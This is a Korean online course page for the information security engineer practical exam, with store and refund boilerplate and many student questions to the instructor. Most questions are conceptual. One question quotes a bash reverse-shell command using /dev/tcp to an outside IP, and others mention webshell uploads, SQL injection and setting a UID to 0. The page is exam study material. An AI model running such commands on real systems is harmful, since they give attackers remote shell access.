결제완료
Install 클릭시 바탕화면에 링크가 설정됩니다.
바로가기를 만드시겠습니까?
로그인이 필요한 서비스입니다.
로그인 하시겠습니까?
지금 바로 확인 하시겠습니까?
지금 바로 확인 하시겠습니까?
지금 바로 확인 하시겠습니까?
· 다음 예시 이미지와 같이 시험명, 수험번호, 시험일, 합격결과가 모두 보이는 원서접수 내역(혹은 합격결과)을 첨부해주세요.
· 개인정보보호를 위해 이름, 전화번호 등 개인정보는 보이지 않도록 합니다.
· 카테고리에서 응시한 자격증을 선택해주세요.
· 시험종류에서 필기 혹은 실기 시험 중 한 개를 선택해주세요.
· 응시하신 시험의 응시회차를 입력해주세요.
· 합격의 핵심 비결이나 내 합격의 가장 내 새울만 한 점을 제목에 작성해 주세요.
예) 3개월만에 합격할 수 있었던 나만의 정보처리기사 공부법
· 구체적인 공부 방법 혹은 합격 비결을 내용에 작성해 주세요.
· 공부했던 문제집, 노트 등 이미지와 함께 작성하면 더 좋습니다.
· 합격수기 내용은 100자 이상 입력 필수입니다.
· 수령일로부터 7일 이내에 신청이 가능합니다.(해외배송 상품 불가)
· 사은품이 포함 된 상품 반품 시에는 사은품을 함께 동봉하여 반품해 주셔야 합니다.
· 반품 환불은 반품도서가 자사에 도착 한 뒤 평일 3~5일 정도의 검수 기간을 거친 후 진행 됩니다.
· 변심 혹은 구매 착오 등에 의한 반품일 경우, 환불 예정 금액에서 배송비 차감 후 환불 됩니다.
· 홈페이지 접속 > 우측 상단의 마이페이지 > 내 주문 > 환불/반품 버튼 선택하여 신청
· 반품 신청 시 반드시 개별비닐포장(래핑)제거여부/사용여부를 기재해 주셔야 신청이 완료됩니다.
· 반품을 접수하지 않고 임의로 반송하시거나, 귀사로 착불 반송을 하는 경우 별도 통지 없이 수령 주소지로 다시 착불로 반송 처리 됩니다.
· 유선문의 : 02-816-1724
· 1:1 문의게시판으로 신청
홈페이지 접속 > 페이지 하단 문의하기(평일 10:00~17:00) > 1:1문의하기에 접속하여 신청
· 상품의 불량에 의한 반품, 교환, A/S, 환불, 품질보증 및 피해보상 등에 관한 사항은 소비자분쟁해결기준 (공정거래위원회 고시)에 준하여 처리됨
· 대금 환불 및 환불 지연에 따른 배상금 지급 조건, 절차 등은 전자상거래 등에서의 소비자 보호에 관한 법률에 따라 처리함
결제완료
상품준비중
주문 수정 가능
배송시작
배송중
배송완료
주문 수정 불가능
배송 단계
· 결제완료, 상품준비중 단계까지 주문 수정(주문취소, 배송지 변경)이 가능합니다.
· 배송시작 단계부터 주문 수정이 불가능하며 단순 변심으로 인한 환불 요청 시 왕복 배송비가 부과됩니다.
· 배송시작 단계에서 배송중 단계로 이동은 최대 영업일 2~3일이 소요됩니다.
· 반품을 희망하실 경우, 배송완료 단계에서 진행 가능합니다.
결제완료
상품준비중
주문 수정 가능
배송시작
배송중
배송완료
주문 수정 불가능
배송 단계
· 결제완료, 상품준비중 단계까지 주문 수정(주문취소, 배송지 변경)이 가능합니다.
· 배송시작 단계부터 주문 수정이 불가능하며 단순 변심으로 인한 환불 요청 시 왕복 배송비가 부과됩니다.
· 배송시작 단계에서 배송중 단계로 이동은 최대 영업일 2~3일이 소요됩니다.
· 반품을 희망하실 경우, 배송완료 단계에서 진행 가능합니다.
·지안패스 상품은 대기 기간 없이 수강 자동 시작됩니다.
·패키지, 단과 상품은 수강 시작하지 않을 시 결제 완료일로부터 7일 후 자동 시작됩니다.
·수강 시작은 강의 목록을 클릭하여 강의 대시보드 진입 시 수강 시작됩니다.
결제취소 및 환불은 02-816-1724로
유선 연락 혹은 1:1문의하기로 문의해 주세요
성명 | |
---|---|
생년월일 | 수강 확인을 위한 생년월일을 입력해주세요. |
교육과정 | |
수강기간 | |
수강료(교재비 미포함) |
당 교육기관(학원)에서 위 교육과정을 수강함을 확인합니다.
(주) 지안에듀
성명 | |
---|---|
생년월일 | 수강 확인을 위한 생년월일을 입력해주세요. |
교육과정 | |
수강기간 | |
수강률 | |
수강료(교재비 미포함) |
당 교육기관(학원)에서 위 교육과정을 수료하였음을 확인합니다.
(주) 지안에듀
🎓 약력
성균관대 컴퓨터공학 석사
전) 새마을금고중앙회 IT부분 디지털개발부 근무
K-Shield(최정예 사이버보안) TOP 10인증( 미래창조과학부/2013)
민간분야 정보보호유공자 표창(행정자치부/2016)
소프트웨어 보안약점 진단원(행정자치부/2016)
정보보안기사/정보처리기사/OCP/MCDBA/MCSE/SCJP 등)
현)알기사 정보보안기사 실기 강사
📖 저서
2024 최신개정판 알기사 정보보안기사실기 개정13판
(지안에듀 출판)저자
실기는 정일영 교수님 커리큘럼만 타면 합격 준비는 끝.
커리큘럼 대로 수강해 보세요.
필기 대비가 끝났다면 다음 시험인 실기 시험 준비는 필수!
실기 기초 이론에서 심화와 문제 풀이까지 올인원! 실기 대비를 한번에 끝낼 수 있습니다.
강의를 직접 수강한 수강생들의 리얼한 후기! 실제 수강생들이 후기로 강의 퀄리티를 증명합니다.
p.123 188번문제 내용 질문드립니다.
161.134.4.0/22 ip 주소 대역의 directed 브로드 캐스트 주소가 왜 161.134.7.255 일까요? 저는 161.134.4.255 라고 생각했는데, 왜 7인지 모르겠습니다. ㅠㅠ
2024 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
시스템 보안에서 윈도우부분은 교재내용만 해도 충분할까요?
기출문제를 보니 윈도우감사정책 및 uac 기타 등등 관련된 다른 것들이 나오던데, 이 부분들을 따로 공부하는 게 좋을까요? 사실 현재 교재의 내용들도 다 숙지하지 못해서 불안정한 상태이지만, 알기사 기출 처음부터 모르는 문제들이 나와서 조금 불안해서요!ㅠㅠ
2024 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
DNS 서버 관련해서 질문드립니다.
안녕하세요. 2024 교재 p350쪽 공부하다가 질문이 생겨서 문의 남깁니다. 재귀적 질의에 대한 제한을 하면, dig나 nslookup으로 보면 찾을 수 없다는 응답이 오는데 그러면 인터넷에서 구글에 들어갈 수 없는 건가요?? 감사합니다.
2024 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
suid관련 권한 부여 및 제거 질문
안녕하세요 강사님! 수업 완강하고 복습중에 질문이 있습니다. suid 권한 부여를 chmod 4755 a.out 이라고 하면, 기호로 표현 될 때 -rwsr-xr-x 라고 표현 되는것이 맞나요? 역으로 -rwsr-xr-x라고 표현되어있으면 4775권한의 파일이라고 생각하면 되는것인가요? 또한 교재에는 권한 제거를 할 때 chmod -s 실행파일명, -s 옵션을 사용하면 suid, sgid 권한을 모두 제거한다. 라고 되어있는데 chmod u -s a.out chmod ug -s a.out 두 가지 다 가능한지 궁금합니다 ! 감사합니다.
2024 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
파일 업로드 취약점 관련 질문있습니다.
선생님 webshell.php 파일 업로드 하면서 궁금한게 2가지가 있습니다. 1. 알기사 사이트 게시판에 해당 파일을 업로드 한뒤 업로드가 되었다면 해당 게시글의 웹쉘 첨부파일을 그냥 저장버튼 클릭해서 다운로드 하면 공격이 되어지는게 아닌가요? 왜 굳이 해당 웹서버 디렉터리에 들어가서 파일을 다운로드 해야 하는거죠? 2. 그리고 분명 webshell.php라는 명의 파일을 업로드 하였는데 디렉토리 취약점으로 해당 경로에 들어가서 보여지는 파일 명은 왜 날짜 명이 나오나요? 그리고 show_name과 real_name으로 보여지는 이유는 무엇인가요? 혹시 웹쉘 파일 코드내 그렇게 보여지도록 코드가 설정이 되어있었던 파일 이였나요? 답변 부탁드립니다. ^^
2024 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
Blind SQL 인젝션 관련 질문 있습니다.
선생님 강의 잘 듣 고 있습니다. Blind SQL 인젝션 관련해서 궁금한 점이 있어서 2가지 질문 남길게요. 1. a,b,c,d,e,f,g,h,i 를 검색하였을때 저 위치에 해당 알파벳이 출력되었다는건 free_board 테이블에 제목 글쓴이 등록일 조회 컬럼에 각 저 문자들이 포함되어 있기 때문인건가요? 2. 그리고 null 문자를 여러개 삽입해서 하신 부분은 이해가 가는데 5번째 부분에 id pass 라는 부분을 넣으셨잖아요. 근데 만약에 저 id pass 도 member 테이블의 컬럼일테니까 결국 저 id pass를 가령 없는 컬럼명이나 컬럼명이 오타가 난채로 기입(예를들어 ip, hass)하면 오류가 나는 건가요? 답변 부탁드립니다.
2024 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
109p logrotate 관련 질문
안녕하십니까 109p logrotate.conf 관련 설명 듣다가 이해가 안되는부분이 있습니다. logrotate.conf에서 weekly로 설정하고 rotate 4 로 설정하면 4주간 동안 보관이 된다고 말씀해주셨는데요. 어떻게 4주간이 되는지 좀더 자세히 설명해주시면 감사하겠습니다. 감사합니다
2024 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
ARP 스푸핑 공격시 변조된 ARP 패킷을 보내는 부분에서 질문드립니다.
안녕하세요. 수업 정말 잘 듣고 있습니다 :) 첨부드린 이미지는 공격자가 변조된 ARP Reply 패킷을 보내는 패킷 캡쳐 화면이고, 공격자 B가 희생자 PC(A-호스트)에게 ARP reply 를 보내고 있습니다. Q1. 공격자는 ARP Reply 패킷을 변조할 때, IP 도 변조하여 보내는 것이 맞나요?
2024 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
(p 346) DNS cache 포이즈닝 공격 질문
(p 346) DNS cache 포이즈닝 공격에서, <교재내용> 공격자가 다수의 응답을 보내는 이유는 공격 대상 Dns 서버가 반복적 질의 시 사용하는 transaction id 와 출발지 port를 모르기 때문에 랜던한 transaction id 와 목적지 port를 다수 생성하여 응답한다. <질문사항> 왜 출발지 port를 모르는 걸까요? 보통 dns는 53/udp 를 쓰니깐, 리커시브 서버도 같은 포트번호를 쓰는 거 아닌가요? 출발지 포트랑 목적지 포트가 같은게 이상하긴 하지만요..
2024 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
디지털 인증서 문의
무선랜에서 EAP-TLS 방식으로 사용자 인증서를 발급하면 A사용자 인증서를 B가 사용할 수 있나요? 보안에 위배되지만 기술적으로 가능한지 궁금합니다.
2024 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
인증서 관련 질문입니다
인증서를 사용하는 이유가 전자서명 과정에서 받은 공개키가 진짜인지에 대한 인증에 보완을 위해 사용되는데 그렇다면 인증서 또한 중간자가 가로채어 중간자의 개인키로 서명되어진 위조된 공개키와 인증서를 만들 수 있지 않나 하는 의문이 들어 질문드립니다.
2024 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
DRDos 대응방법에 대한 질문이 있습니다!
안녕하세요 강사님! DRdos 대응 방법 1번의 Ingress 필터링 관련 질문이 있습니다. 실제로 외부에 노출되어 있는 서비스 공인 IP (elb, elastic IP)등이 아닌 private IP의 경우 DrDos를 수행해도 routing이 되지 않을 것 같은데 어떻게 해당 IP로 spoofing을 수행하여 외부망에서 내부망으로 들어올 수 있는지 이해가 되지 않아 1번의 대응 방법이 확 와닫지 않습니다. loopback이나 private IP로 IP spoofing을 수행하여 외부망에서 어떻게 routing이 되어 내부망으로 들어오는지가 궁금합니다! 답변 감사합니다! 제가 패킷을 공격자 관점에서 이해하려고 해 버려서.. 혼란이 왔었네요!
2024 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
정보보안 법규 강의 질문입니다.
사소한 질문이지만 정보보안 법규들의 이름의 줄임말들을 알 수 있을까요?(ex.개인정보 보호법=개보법) 시험과 크게 관련이 없을 수 있지만 책에 있는 큰 제목(ex.개인정보의 안전성 확보 기준, 정보통신망 이용 촉진 및 정보보호 등에 관한 법률 등)의 실무에서 사용하는 약어를 알고 싶습니다. 큰 그림을 그리는데 도움이 많이 될 것 같습니다. 추가로 주제 넘지만 개인적 후기로 2025 출판시 '정보보안 일반/관리' 파트에서 '위험관리' 부분의 목차 구성을 조금 바꾸면 좋을것 같습니다. -요약: 위험 관리 과정을 소괄호로 빼고 단계별 순서로 목차 구성([]가 빼는 부분) -현재: 개요(정의 >> 위험관리 과정) >> 위험 구성요소 >> 위험 관리 전략 및 계획 수립 >> 위험 분석(... >> 위험평가 >> ...) >> 정보보호 대책 선정 >> ... -제안: 개요(정의) >> 위험 구성요소 >> [위험관리 과정] >> 위험 관리 전략 및 계획 수립 >> 위험 분석 >> [위험 평가] >> 정보보호 대책 선정 >> ... 여담으로 오늘 마지막 강의를 들었는데, 저희 회사의 업무를 정보보안 측면에서 이해할 수 있어서 좋았습니다. 새벽에 강의 들을때마다 강사님 우측하단 시간 보면서 힘을 냈습니다. 새벽에 강의를 찍으셨더라구요. 이해하기 쉽게 꼼꼼히 알려주셔서 감사합니다. 이 말이 좋더라구요. "대단히 수고하셨습니다."
2024 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
df 옵션 관련 질문
안녕하십니까 교재 54p 실습 사진에서 df -h / 와 df -h /tmp 설명이 아래와 같이 나와있습니다. df -h / : '/' 디렉터리에 마운트된 파일시스템의 여유 공간 크기 출력 df -h /tmp : '/tmp' 디렉터리가 속한 파일시스템의 여유 공간 크기 출력 df -h 뒤에 똑같이 폴더명을 썻는데, 어떤 조건에 따라 디렉터리에 마운트된 파일시스템의 여유 공간이 나오고 또는 디렉터리가 속한 파일시스템의 여유 공간이 나오는지 궁금합니다 감사합니다
2024 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
리눅스 사용을 많이하는 이유 질문드립니다.
먼저 저는 SW쪽 지식이 하나도 없는 상태로 얼떨결에 필기를 합격했습니다. 그래서 죄송하지만 이렇게 기본적인 질문을 드립니다.. 1.저희가 주로 페도라 리눅스로 실습을 하고, 배우고 있는것이 맞을까요? 예를들어 APM 환경도 Apache가 리눅스 환경인것인지, 윈도우로도 가능한 환경인지 궁금합니다. 2.대부분의 사람들은 윈도우를 사용하는데 리눅스를 주로 배우는 이유가 무엇일까요? 서버는 주로 리눅스 환경으로 구현하기 때문일까요? 3.서버를 주로 리눅스로 구현한다면 윈도우 환경이 불가해서 그런건지, 리눅스의 장점이 서버에 잘 맞기 때문에 그런것인지 궁금합니다. 짧은 생각으로는 윈도우가 더 편하지 않은가 해서요... 감사합니다. 강의 이해가 너무 잘됩니다!
2024 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
25강 p109 rotate 질문
강사님 알기사 실기 p109 rotate 질문관련해서 질문드립니다. postrotate와 endscript 사이에 ||true도 있는데 이부분은 강의에서 설명이 없어서요. 혹시 이게 어떤 뜻인지 알수있을까요 postrotate /bin/kill -HUP 'cat /var/run/httpd/httpd.pid 2>dev/null' 2>/dev/null || true endscript 오류는 버리고 httpd.pid의 값을 읽어서 SIGHUB를 보낸다 까지는 알겠는데 뒤에 2>/dev/null || true 부분이 해석이 안됩니다.
2024 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
101강 첨부자료 제목
101강 첨부자료(SSL/TLS 인증서)에서 마지막 '다.'번 제목 수정이 필요해 보입니다.(발급처(Issuer) 등 정보 >> 인증서 상태)
2024 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
umask 관련 질문이 있습니다
안녕하십니까 section 7 강의에서 umask 관련 내용을 들었습니다. 궁금한 부분이 /etc/profile 이나 /etc/bashrc 파일에 umask 설정이 0022 로 되어있다면, umask 명령으로 (예를들어 umask 0055) umask를 변경하면, /etc/profile 이나 /etc/bashrc 파일안에 umask 설정도 자동으로 변경(0022 -> 0055)되는 건가요 ? 감사합니다
2024 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
4회 필기에서 나왔던 문제인데 혹시 어떤게 정답일까요
실기 공부하다가 프로토콜을 보고 갑자기 필기때 이해가 안됬던 문제가 생각나서 질문드립니다.. 다음 보기중 틀린걸 고르는 문제였는데 보기 다 맞지 않나요? Smtp tcp 25 Ssh tcp 22 Ftp tcp 21 Telnet tcp 23 어떤분은 문제오류같다고 하고 어떤분은 smtp 보안때문에 포트를 변경해서 쓰기 때문에 smtp가 틀린것같다고 하는데... 어떤게 맞을까요
2024 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
섹션 8,9 제목 문의입니다.
웹 애플리케이션과 웹 서버의 차이점이 무엇인가요..? 인터넷에는 동적/정적 차이라고 하는데 직감적으로는 이해가 가는데 글로는 잘 이해가 안됩니다.
2024 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
p.344 DNS 스푸핑 공격 실습 관련 문의입니다.
실습에서 root@bt:~/LEC_DNS_SPOOF# 으로 명령어를 보여주시는데 이것은 만드신 앱인 'LEC_DNS_SPOOF'의 툴인 arpspoof, dnsspoof 등을 이용한다는건가요? 아니면, 기본적으로 윈도우에서 arpspoof, dnsspoof 등의 툴을 제공하는건가요?
2024 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
"66강. 065.네트워크보안프로토콜_05 /(1권)p315~3220"강의 내용 질문입니다.
1.SSL/TLS의 뜻은 뭔가요? SSL에서 발전된게 TLS여서 같이 써주는건가요? 2.SSL/TLS에서 완전 협상시 Client Key Exchange 과정에서 premaster secret가 생성된다고 써있는데, 앞장(p.315)에서는 완전 협상 과정에서 premaster secret, client random, server random으로 master secret까지 만들어진다고 써있습니다. master key는 premaster secret 전송 후 각자 생성되는건가요?
2024 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
inetd 관련.
우분투에서 실습을 따라하는 도중에, 최근에는 inetd , xinetd이 없더라구요. 대신에 systemd 로 대체된거 같은데, inetd와 systemd 두개다 공부를 해야하는 걸까요? (시험으로는 어디까지 공부하는 것이 좋을까요? ) *AI에 질문했을 때도 systemd 를 쓴다고 하네요. *systemd 는 포맷이 많이 다르네요.
2024 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
재질문 002. 48:22 base64 인코딩 이유.
002. 48:22 base64 인코딩 이유. 양승민 2024-09-19 강의에서 바이너리로 저장하면 손실이 일어날 수 있어서 base64라 인코딩했다고 했습니다. 왜 바이너리로 저장하면 손실이 일어날 수 있는 걸까요? [강의질문]2024 정일영 정보보안(산업)기사실기 최신 강의 [교재별도] 답변 정일영 2024-09-19 안녕하세요~! 정일영입니다. shodow 파일을 보면 암호화된 패스워드(해시값)가 텍스트 형식으로 저장되어 있습니다. 실제 암호화된 패스워드(해시값)은 바이너리 데이터(텍스트가 아닌 0과 1의 비트열)입니다. 이러한 바이너리 데이터를 텍스트로 전환하여 파일에 저장하기 위해서는 모든 비트가 손실없이 텍스트(문자)로 변환할 수 있는 인코딩 기법이 필요합니다. 이러한 인코딩 기법중에 가장 대표적인 방식이 64진수 문자로 변환하는 Base64 인코딩(또는 Radix64라고도 함)이 있습니다. 간단히 정리해보면, 바이너리 데이터의 모든 비트열을 문자로 변환할 수 있는 인코딩 방식을 적용해야 바이너리 데이터를 손실없이 텍스트로 변화할 수 있습니다. 이러한 인코딩 방식중 대표적인 예가 Base64인코딩 입니다. 열공하세요~! ============= 바이너리로 저장하면 손실이 일어나는 이유가 궁금해서 질문했습니다! 바이너리에서 인코딩 단계를 거치면서 손실이 일어나면 이해할거같은데, 원본 소스를 그대로 유지하는데 왜 손실이 일어날 수 있는 걸까요?
2024 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
51:12 일반 사용자 UID 변경을 통한 root 권한 변경
root@seungsang:~/Desktop# cat /etc/passwd | egrep '^seungsang' seungsang:x:0:0:seungsang:/home/seungsang:/bin/bash passwd 에서 UID, GID 를 0으로 하면 root 권한을 가진다고 해서 변경해봤습니다. passwd 파일이 인증할 때 사용된다고 하셔서 껏다 켜니, user 이름이 root 로 변경되었네요.(root@seungsang) root 권한을 가져온다는 것은 계정명도 root 로 변경되는 건가요? whoami 명령을 쳐도 root 로 뜨는데, 기존 계정명은 그대로 둔채로 권한만 root 로 가져오도록 passwd 파일에 설정할 수 없나요? *우분투 입니다.
2024 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
002. 48:22 base64 인코딩 이유.
강의에서 바이너리로 저장하면 손실이 일어날 수 있어서 base64라 인코딩했다고 했습니다. 왜 바이너리로 저장하면 손실이 일어날 수 있는 걸까요?
2024 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
공부 방향에 질문 있습니다.
안녕하세요 보안기사 패키지로 수강 잘하고 있습니다. 다름아닌 제가 이전 보안기사 필기시험을 59점으로 불합한 상황인데 여기서 공부를한다면 필기 강의로 계속해야되는지, 아님 실기로 넘어가도 다음 필기시험때 문제가 될수도 있지않을까해서 강사님의 의견이 궁금하게 되었습니다.
2024 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
윈도우 인증 구성요소 관련하여 질문 드립니다.
선생님 안녕하세요 2번 강의 내용 중 윈도우 인증 구성요소 중 SRM이 service reference monitor, security reference monitor 둘 중에 어떤게 맞는건가요? 24년으로 개정되면서 바뀐 내용인가요?
2024 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
IPsec 제한된 트래픽 흐름의 기밀성 관련 질문입니다.
안녕하세요. 시험전 마지막 준비전에 헷갈리는 부분이 있어 질문드립니다. 교재302~303페이지 이구요..302페이지엔 게이트웨이 게이트웨이 구간이 트래픽 흐름 노출구간이라 되어있는데 303페이지엔 그구간이 보호구간이라 되어있습니다. 혹시 두개의 차이가 어떤건지 정확히 알고싶습니다. 공부할때마다 헷갈린 내용이라, 정확히 알고가고 싶습니다.
2024 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
2024 75-79p 강의
xinetd에 대한 강의가 없는 것 같습니다. 강의에선 리눅스에선 inetd가 아닌 xinetd를 사용한다고 하고 그 외에 특별한 언급은 없는것 같은데 스스로 공부해야할까요?
2024 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
강의 제목 개선 요청
안녕하세요. 강의 제목에 주제 기재가 되어있지 않으니까 어떤 내용이 궁금할 때 관련 강의를 찾기가 좀 힘드네요.. 교재가 있다면 페이지를 보고 찾겠지만, 그렇지 않은 환경에서는 불편함이 있습니다!
2024 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
망분리 의무대상 문의
년도 말 기준 3개월간 개인정보 저장 관리되고 있는 이용자 수 일일평균 100만명 이상인 개인정보처리자 라는 문구가 이해가안가네요 100만명이상의 데이터에 대해 접근이 가능한 대상인건지 아니면 실제 개인정보 1건이라도 접근이 가능한 회사에 서비스를 이용하는 사람이 100만명이상이라는건지요?
2024 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
Netbios 및 SMB포트 관련질문입니다.
안녕하세요~ 문제 풀다가 애매한 부분이 있어서 가져왔는데..223번문제에 Netbios 및 SMB 포트 차단관련문제인데 통상적으로 알기는 UDP 137~138, TCP 139, 445를 차단하는건으로 아는데 문제답에는 135번 포트가 갑자기 나오고 답도 명확하지 않습니다. 135번 포트가 맞다고 쳐도 NetBIos 차단포트는 TCP 135, UDP 137~138 Tcp/ip 기반 SMB 차단포트는 TCP 445이렇게 되어야도는게 아닌가요? 게다가 136번포트는 관련없는듯 한데 135~139로 표기하는것은 오류가있다고 생각합니다. Tcp/udp 구분없이 쓴거도 그렇고 많이 모호한 답값아서 질문드립니다
2024 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
2024 실기책 761-765p
별도의 강의 자료는 없나요?
2024 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
TCP SYN flooding 공격 대응책 관련 질문입니다. (2024실기1권 255p)
안녕하세요 선생님. 좋은 강의 찍어주셔서 항상 감사드립니다. TCP SYN flooding 공격 대응책 2번을 보면 동일 IP의 연결 요청에 임계치 설정을 한다는 내용이 있는데 253p의 실습처럼 공격자가 출발지 IP를 임의값으로 위조할 경우 해당 대응책이 효과가 있는지 궁금합니다. 강의에서 Syn Cookie 설정은 SYN Flooding 공격을 대응하기 위해 나온 기술이 아니라 한계가 있다고 말씀하셨고 First SYN Drop 설정은 SYN 요청을 두번씩 보내는 것으로 무력화 가능하다고 하셨는데 동일 IP의 연결 요청에 임계치 설정을 하는 것이 Syn Cookie 설정이나 First SYN Drop 설정보다 유의미한 효과가 있나요? 강의를 듣고 복습하는 도중 궁금증이 생겨 질문 남깁니다.
2024 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
NetBIOS 실습 질문(158~160)
안녕하세요 선생님 1. NetBIOS over Tcp/IP 사용 안함 설정시 135번 포트는 왜 안닫히고 유지되는 건지 궁금합니다. 2. 사용 안함을 설정하면 인터넷으로부터 접근이 차단되는데, 해당 네트워크는 인터넷이 아예 사용이 안되게 되는 건지 궁금합니다. 감사합니다.
2024 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
snort 문제 풀이중에 질문입니다(문제 742~743)
질문에 필요한 부분만 넣었습니다. 742. 텔넷 서비스 포트는 기본 포트사용, 모든 텔넷 접속 패킷들을 검사하는 스노트룰 작성의 답이 alert tcp any any -> any 23 입니다. 그런데 743번 문제 (2) (3)번에 보면 비슷한조건인데 여기서는 alert tcp any any (양방향 화살표) any 23 alert tcp any any (양방향 화살표) any 443이렇게 설명되어 있는데.. 두개의 차이가 대체 무엇인지 궁금합니다. -> 이렇게 넣어도 무리가 없어보이는데...이러면 틀리는 건가요?
2024 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
레이스 컨디션 관련 질문입니다.(좀많습니다... 죄송합니다 ㅜㅜ)
1. 선생님 강의 들으면서 레이스컨디션 강의를 듣고있었는데 강의에서는 race_cond.c 테스트코드 설명해주시면서 argv[0]은 프로그램명, argv[1]는 파일명, argv[2]는 데이터라고 하셨잖아요. 근데 교재에서는 argv[0]이 파일명을 입력받고 1이 파일에 출력할 데이터를 입력받는다 라고 되어있는데 어느게 맞는건가요? 책이 오타가 난건가요? 2. 실습 예시에서 tmp/tmp.dat 파일을 race_cond 파일을 통해 정일영 작성 후 생성 삭제하시고 그다음 링크파일 생성후 삭제하셨잖아요 그건 레이스컨디션 실습하고는 관계없이 그냥 보여주신건가요? 3. 마지막 실습에서 kiwi99에서 race_cond를 통해 임시파일 생성할때 루트 패스워드를 지운 데이터를 입력하셨고, 링크파일을 생성한 kiwi88이 공격자라고 말씀하셨는데 그렇다면 동시에 임시파일을 생성했었던 kiwi99가 공격대상(victim)이 되는건가요? 그리고 해당 실습부분영상에서 코드가 허술하게 되어있다고 말씀하셨는데 무슨 코드가 허술하게 되있다는건가요?
2024 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
2024 실기책 379p 질문
조건절이 항상 참이되도록 만들어 '모든레코드'가 select 될수있도록 하고있다고 표현되어있는데 왜 id,pass 값만 조회되는게 아니라 모든 레코드가 조회되는지 궁금합니다 조건절이 true면 그냥 select 절에 적힌게 실행되는게 아닌지. .
2024 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
작업 스케줄러(cron) 관련 질문입니다.
선생님 cron 관련 질문이 하나 있는데요 예시중에 시간 부분에 8-10 이라는 부분에서 설명이 8,9,10시에 무엇무엇을 한다고 나와있는데요. 여기서 -는 범위를 나타낸다고 하셨잖아요. 그렇다면 직역하자면 8시에서 10시까지라는 말이 되는데 혹시 시험에서 8시에서 10시까지 또는 8시 부터 10시까지 이런식으로 범위성으로 작성하면 틀린건가요? 아니면 -가 요일 또는 시간에 따라 다르게 해석이 되는건지 궁금합니다.
2024 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
AH프로토콜 전송모드
실기책 305페이지 'AH프로토콜 동작모드'에 전송모드는 ip헤더의 전송중 변경가능한 필드를 제외한 ip패킷 전체를 인증한다 라고 적혀있습니다. 궁금한점은 전송모드는 ip packet(헤더+payload) 의 payload만 보호하므로 AH 전송모드에서 payload만 인증하는게 아닌가요ㅠ ip패킷 전체(mutable field제외)를 인증한다고 암기하는걸까요
2024 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
/bin/bash > /dev/tcp/10.10.10.10/8081 0<&1 관련 질문드립니다.
위의 내용이 조금 헷갈려서요. 1. bash의 대한 표준 출력이 8081포트로 리다이렉트 2. 이후, 8081포트의 표준 출력은 /bin/bash에 대한 표준 입력으로 리다이렉트 두 가지를 활용해서 리버스 쉘을 실현하는 거 같은데, 만약, 공격자는 telnet등을 통해서 8081포트로 접속한다면, nc처럼 표준 출력은 원하는 내용 치고 Enter를 누르면 되는 건가요? 표준 출력은 모니터로 잡혀 있기 때문에 그런 것이겠죠? 또한, /bin/bash로 표준 입력을 보내주면 루핑 같은 게 될 거 같은데, 이런 문제는 없을까요? 왜냐면, 8081포트 표준 출력 > bash로 입력 > 8081포트 표준 출력 > bash로 입력 반복일 거 같구, 만약, 루핑이 안되는 거라면, 8081포트 표준 출력 > bash 입력 으로 작업이 끝나서 공격자는 bash의 결과 값은 못보는 거 아닌가요? putty로 연결하고 로컬 터미널을 리버스 쉘처럼 pts/0 터미널로 리다이렉트 해봤더니 엔터 누를 때마다 입력 커서가 로컬 터미널랑 pts/0이랑 이리저리 왔다갔다 합니다. 정확히 이해하고 싶은데, 너무 어렵네요 ㅠ 제가 맞게 이해를 한건 맞는 지 궁금합니다.. 아닌 부분을 지적해주시면 너무 감사하겠습니다. 너무 글이 장황하다면, 다시 한 번 질문을 올려보겠습니다. 감사합니다.
2024 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
강의자료 한꺼번에 다운받을 수 없나요?ㅠㅠ
하나하나 다운받아서 정리하다보니 순서가 안나와서 정리가 어려운데 한번에 다운받을순 없나요..?
2024 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
SMURF Attack 3)실습자료 질문
